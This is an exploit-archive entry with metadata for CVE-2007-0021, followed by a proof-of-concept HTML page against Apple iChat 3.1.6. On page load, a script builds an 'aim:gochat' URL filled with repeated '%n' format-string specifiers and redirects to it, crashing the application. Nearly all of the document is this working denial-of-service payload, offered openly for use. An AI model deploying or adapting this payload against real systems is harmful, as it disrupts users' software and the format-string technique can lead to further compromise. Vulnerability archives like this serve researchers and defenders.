Apple iChat 3.1.6 441 - 'aim://' URL Handler Format String (PoC)

Author: MoAB
type: dos
platform: osx
port: 
date_added: 2007-01-20  
date_updated: 2016-09-20  
verified: 1  
codes: CVE-2007-0021  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 3166.html  

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-20-01-2007</title>
		<script>
			function boom() {
				var str = '';
				for (var i = 0; i < 20; i++) {
				    str = str + escape('A%n');
				}
				str = 'aim:gochat?roomname=' + str;
				window.location = str;
			}
		</script>
	</head>
	<body onload="boom()">
	</body>
</html>

# milw0rm.com [2007-01-21]